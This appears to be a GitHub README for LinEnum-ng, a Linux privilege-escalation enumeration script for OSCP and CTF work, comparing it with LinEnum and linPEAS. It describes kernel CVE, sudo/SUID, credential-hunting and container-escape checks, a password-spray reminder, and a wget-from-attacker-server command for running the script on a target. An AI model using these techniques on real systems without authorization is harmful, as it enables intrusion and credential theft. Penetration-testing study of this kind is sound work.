A focused, stable, OSCP-oriented Linux privilege escalation enumeration script.
There are two well-known tools in this space: the original LinEnum and linPEAS. I built LinEnum-ng because neither fully hits the mark for OSCP-style work :D
vs. LinEnum (@rebootuser)
LinEnum is the classic. It works, it's simple, and it's been around forever. But it's also showing its age:
| LinEnum | LinEnum-ng | |
|---|---|---|
| Kernel CVE checks | ❌ None | ✅ PwnKit, Dirty Pipe, Dirty COW, Baron Samedit, eBPF, sudo CVEs |
| SUID exploitation hints | ❌ Lists only | ✅ Cross-references full GTFOBins list with explanation |
| Container detection | ✅ Docker, LXC, Kubernetes (with token/API checks) | |
| Sudo with password | ✅ Pass via -p flag, non-interactive |
|
| Username hunting | ❌ | ✅ -u flag: finds files by name and content |
| Group privesc | ✅ Docker, LXD, disk, adm, shadow, video — each with exploitation steps | |
| Color output | ❌ | ✅ linPEAS-style color scheme |
| Password spray hint | ❌ | ✅ Reminds you to try found passwords against all users |
... more yet to come
linPEAS is powerful and actively maintained <3. LinEnum-ng doesn't try to replace it (NEVER). The reason this script exists is more specific:
linPEAS changes too much between versions and has too much noise for a 24H exam.
If you've done enough OSCP boxes, you've hit this: a specific linPEAS version finds the vector immediately, then you update and the next version misses it entirely (happened to me on the exam)!
LinEnum-ng is intentionally stable and scoped. It covers exactly what the OSCP exam environment tends to test:
- Kernel exploits with version-specific CVE matching
- Sudo misconfigurations (passwordless and with credentials)
- SUID/SGID binaries cross-referenced against GTFOBins
- Cron job weaknesses
- Writable (and soon readable) paths and service files
- Credential hunting in configs, history files, and environment
- Container escape vectors
- Group-based privilege escalation (docker, lxd, disk, adm, shadow)
The output is clean, color-coded, and structured so you can triage top-to-bottom quickly. No information overload, no hunting through walls of green text.
- Kernel CVE detection with links -- Copy-Fail (CVE-2026-3143), PwnKit (CVE-2021-4034), Dirty Pipe (CVE-2022-0847), Dirty COW (CVE-2016-5195), Baron Samedit (CVE-2021-3156), eBPF (CVE-2017-16995), sudo CVEs (CVE-2019-18634, CVE-2025-32463, and more)
- GTFOBins-aware sudo/SUID checks -- flags exploitable binaries automatically
- Kubernetes pod detection -- service account token readability, API server access test, namespace, env vars
- Docker and LXD group privesc -- complete exploitation steps included in output
- Password-aware sudo check -- pass
-pto test sudo with credentials non-interactively - Username file hunt -- pass
-uto scan the entire filesystem for files related to a target user - Password spray reminder -- if you found a password during enumeration, the script reminds you to try it against all other users
- linPEAS-style color output -- red for critical, yellow for interesting, green for clean
./LinEnum-ng.sh [OPTIONS]| Option | Description |
|---|---|
-p PASSWORD |
Supply a known password. Used for authenticated sudo -l and credential checks. |
-u USERNAME |
Target a username. Hunts files named after or containing that user across the filesystem. |
-h, --help |
Show help and usage examples. |
# Basic run, no credentials
./LinEnum-ng.sh
# Test sudo access with a found password
./LinEnum-ng.sh -p 'Summer2024!'
# Hunt for files related to a specific user
./LinEnum-ng.sh -u john
# Full run: password check + username hunt
./LinEnum-ng.sh -p 'Summer2024!' -u johnThe script runs top-to-bottom through these sections:
- Basic System Info and Kernel Version
- Kernel Exploit Vulnerability Check -- start here on older kernels
- User / Group Information
- Sudo and SUID/SGID Enumeration
- Environmental Information
- Scheduled Tasks (Cron and Systemd Timers)
- Services and Processes
- Network Information
- Database Enumeration
- Web Server Enumeration
- Shell and Profile Files
- SSH Keys and Configuration
- Writable Locations
- Interesting Files and Password Hunting
- Container and Group Privilege Escalation (Docker, LXD, disk, adm, shadow)
- System Configuration Files
- Username Hunt (if
-usupplied) - Final Summary and Reminders
| Color | Meaning |
|---|---|
| Red text on yellow background | Confirmed vulnerability or critical misconfiguration — act on this |
| Bright red | Notable finding — group membership, sensitive file, writable path |
| 🟡 Yellow | Section headers and informational prompts |
| 🟢 Green | Clean / not vulnerable / check passed |
| 🔵 Cyan | Raw command output and data values |
| 🟣 Magenta | Exploitation steps, links, and remediation hints |
# Python HTTP server
python3 -m http.server 8080
# On target
wget http://<your-ip>:8080/LinEnum-ng.sh -O /tmp/LinEnum-ng.sh
chmod +x /tmp/LinEnum-ng.sh
/tmp/LinEnum-ng.shCopying and pasting a large script directly into a terminal can hang or crash CTF machines due to buffer overload. Wrap it in a heredoc instead. The shell receives the content as a stream rather than a raw paste flood:
cat > LinEnum-ng.sh << 'EOF'
<paste the full script content here>
EOF
chmod +x LinEnum-ng.sh && ./LinEnum-ng.shThe single quotes around 'EOF' are important. They prevent the shell from trying to expand variables inside the script while it's being written to disk.
| Feature | LinEnum | linPEAS | LinEnum-ng |
|---|---|---|---|
| Kernel CVE matching | ❌ | ✅ | ✅ |
| GTFOBins SUID/sudo cross-ref | ❌ | ✅ | ✅ |
| Kubernetes detection | ❌ | ✅ | ✅ |
Non-interactive -p flag |
✅ | ✅ | |
| Username filesystem hunt | ❌ | ❌ | ✅ |
| Password spray reminder & hints | ❌ | ❌ | ✅ |
| Color output | ❌ | ✅ | ✅ |
| Version stability | ✅ | ✅ | |
| OSCP-scoped, no noise | ✅ | ✅ |
If LinEnum-ng helped you pop a shell, pass the OSCP, or saved you time on a CTF, consider leaving a star.
LinEnum-ng by Strikoder